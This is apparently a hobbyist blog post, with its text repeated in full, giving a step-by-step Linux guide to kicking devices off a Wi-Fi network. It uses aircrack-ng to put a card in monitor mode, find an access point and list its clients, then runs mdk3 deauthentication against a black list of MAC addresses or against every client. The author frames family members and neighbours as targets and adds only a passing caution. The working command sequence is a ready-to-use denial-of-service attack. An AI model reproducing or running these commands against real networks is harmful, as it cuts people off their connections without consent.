Requirements:
OS: Linux
Wireless card with support for: injection and monitor mode.
Packages:
If you know your system skip the first steps.
1. First thing we need to do is see if your wireless card supports injection and monitor mode.
For the sake of this tip we will call your wireless device wlan0. If you need to know what yours is type this command.
2. Take your card down with this command
3. Now to test if your card support monitor mode.
We first need the physical name of the wireless card. For this run.
4. Once you have it run this but replace phy0 with yours.
So if everything’s cool lets move on. If not you may need newer drivers or a different wireless card. I recommend the Alfa USB WiFi AWUS036H.
Now we are ready to have some fun.
5. You need to get some info about your access point to proceed. So at this point disconnect from your network and lets get to it.Use this command to get info about your access point.
Take note of your essid, mac address, and channel.
6. Once you have it lets take a closer look at who is on line with the same command but a little different.
A.) Bring your network card back up with this command.
--bssid is for your mac address on your access point.If you want to store the captured packets just add the -w option with the location you want to store the capture files. This would look like this
Now kick back and watch the stations appear. Each system on the network will show up at the bottom as they use the wireless. You can cross reference the first three MAC segments xx:xx:xx on line to see the manufacturer until you find your pray. For me it was my daughters Kindle Fire.
Once you see the device you want to kick off the network write down the mac address and hit Ctrl+C to stop the packet capture.
Now finally for the moment of truth. Which family member do you have in your sites. Once you pick one run this command.
This creates a list of mac addresses you want to kick. If you want to add more then one change the > to >>.
The final command.
That's it. As long as the command runs they will be kicked off line. Unless they spoof there mac address or use another access point. This also works well for neighbors that your wife gives the pass-phrase out to.
You can take this a step further and kick everyone off the access point with this command.
To stop the attack just hit Ctrl+C to kill the command and everyone will be able to connect again.
Have fun and remember its cool to play with your own equipment but don't cause trouble for other people. That's not nice.
OS: Linux
Wireless card with support for: injection and monitor mode.
Packages:
- aircrack-ng
- mdk3
If you know your system skip the first steps.
1. First thing we need to do is see if your wireless card supports injection and monitor mode.
For the sake of this tip we will call your wireless device wlan0. If you need to know what yours is type this command.
- ifconfig -a
2. Take your card down with this command
- ifconfig wlan0 down
- aireplay-ng -9 wlan0
3. Now to test if your card support monitor mode.
We first need the physical name of the wireless card. For this run.
- airmon-ng
4. Once you have it run this but replace phy0 with yours.
- iw phy phy0 info |grep -A8 modes
So if everything’s cool lets move on. If not you may need newer drivers or a different wireless card. I recommend the Alfa USB WiFi AWUS036H.
Now we are ready to have some fun.
5. You need to get some info about your access point to proceed. So at this point disconnect from your network and lets get to it.Use this command to get info about your access point.
- airodump-ng wlan0
Take note of your essid, mac address, and channel.
6. Once you have it lets take a closer look at who is on line with the same command but a little different.
A.) Bring your network card back up with this command.
- ifconfig wlan0 up
- iwconfig wlan0 channel 6
- ifconfig wlan0 down
- airodump-ng -c 6 --bssid {mac address for access point} wlan0
--bssid is for your mac address on your access point.If you want to store the captured packets just add the -w option with the location you want to store the capture files. This would look like this
- airodump-ng -c 6 --bssid {mac address for access point} -w {path and name of file} wlan0
- airmon-ng stop mon0
- airmon-ng stop wlan0
Now kick back and watch the stations appear. Each system on the network will show up at the bottom as they use the wireless. You can cross reference the first three MAC segments xx:xx:xx on line to see the manufacturer until you find your pray. For me it was my daughters Kindle Fire.
Once you see the device you want to kick off the network write down the mac address and hit Ctrl+C to stop the packet capture.
Now finally for the moment of truth. Which family member do you have in your sites. Once you pick one run this command.
- echo "xx:xx:xx:xx:xx:xx" > ./black.lst
This creates a list of mac addresses you want to kick. If you want to add more then one change the > to >>.
The final command.
- mdk3 wlan0 d -n {essid} -b ./black.lst
That's it. As long as the command runs they will be kicked off line. Unless they spoof there mac address or use another access point. This also works well for neighbors that your wife gives the pass-phrase out to.
You can take this a step further and kick everyone off the access point with this command.
- mdk3 wlan0 d -n {essid}
To stop the attack just hit Ctrl+C to kill the command and everyone will be able to connect again.
Have fun and remember its cool to play with your own equipment but don't cause trouble for other people. That's not nice.
0 comments:
Post a Comment